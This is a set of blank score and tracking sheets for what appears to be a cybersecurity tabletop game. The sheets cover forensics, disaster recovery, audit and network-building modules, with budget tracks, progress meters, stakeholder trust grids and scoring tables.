Cross off as each turn ends. Circle your turn limit before starting.

 1   2   3   4   5   6   7   8   9   10   11   12   13   14   15   16
[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]

Budget Track

Start at your module's budget (Network Building 40-60 · Disaster Recovery 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150). Tick down in 5s.

150 145 140 135 130 125 120 115 110 105 100  95  90  85  80  75
 70  65  60  55  50  45  40  35  30  25  20  15  10   5   0

Reputation / Score Track (0-100)

100  95  90  85  80  75  70  65  60  55  50  45  40  35  30  25  20  15  10  5  0

Uncontained Threats (Incident Response)

 0   1   2   3   4   5
[ ] [ ] [ ] [ ] [ ] [ ]      Penalty at start of turn: -5 Budget each

Forensics Module Sheet — Progress Meters

Advance each meter per card effects. Victory thresholds marked ▲.

ATTRIBUTION      0   10   20   30   40   50   60   70   80   90▲  100
TIMELINE         0   10   20   30   40   50   60   70   80▲  90   100
ATTACK CHAIN     0   10   20   30   40   50   60   70   80▲  90   100
CHAIN OF CUSTODY 0   10   20   30   40   50   60   70▲  80   90   100

Victory check (end of game):
- V1 Full Attribution: Attribution ≥90 AND Timeline ≥80
- V2 Solid Case: Timeline ≥80 AND Attack Chain ≥80 AND Chain of Custody ≥70
- V3 Partial Findings: any two meters ≥70

Investigation in flight: ____ (results arrive Turn _)

Evidence collected (✓ = Analyzed, one Analyze per card):

Evidence card               Documented? (+5% CoC)   Analyzed?
_______________________     [ ]                     [ ]
_______________________     [ ]                     [ ]
_______________________     [ ]                     [ ]
_______________________     [ ]                     [ ]

Disaster Recovery Module Sheet

Crisis Progress Tracks

INVESTIGATION   0   10   20   30   40   50   60   70   80   90   100
REMEDIATION     0   10   20   30   40   50   60   70   80   90   100
COMMUNICATION   0   10   20   30   40   50   60   70   80   90   100

Stakeholder Trust (0-100%; any stakeholder at 0% = company collapses)

Stakeholder         100   80    60    40    20 (critical)   0 (LOSS)
Customers           [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Employees           [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Regulators          [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Board / Investors   [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Media / Public      [ ]   [ ]   [ ]   [ ]   [ ]             [ ]

Deadline Timeline (mark scheduled events at setup)

Turn               1     2     3     4     5     6     7     8
Scheduled event    ___   ___   ___   ___   ___   ___   ___   ___
Deadline           ___   ___   ___   ___   ___   ___   ___   ___

Deadlines to place at setup: Customers notified (recommended) · Regulator penalties begin · GDPR 72h — regulators notified

Multi-turn action in flight: ____ (completes Turn _)


Audit & Compliance Module Sheet — Scoring Worksheet

#   Domain                    Stars (1-5)   PASS (3★+) / FAIL (1-2★)   Key gap found
1   Network Segmentation      _____         ______                     __________________
2   Identity & Access         _____         ______                     __________________
3   Detection & Monitoring    _____         ______                     __________________
4   Backup & Recovery         _____         ______                     __________________
5   Cloud Security            _____         ______                     __________________
6   Security Operations       _____         ______                     __________________

Result: ___ / 6 PASS — Gap penalties for follow-on modules: see module rules (total capped at -30).


Network Building Module Sheet — Score Sheet

Category               Points   Notes
Requirements met       ____     per requirement card
Security coverage      ____     per rules scoring table
Capability coverage    ____     per rules scoring table
Budget management      ____     per rules scoring table
TOTAL                  ____

Components placed:

Component                 Cost    Capacity used / total
_____________________     ____    ____ / ____
_____________________     ____    ____ / ____
_____________________     ____    ____ / ____
_____________________     ____    ____ / ____

Budget remaining: ___ / starting ___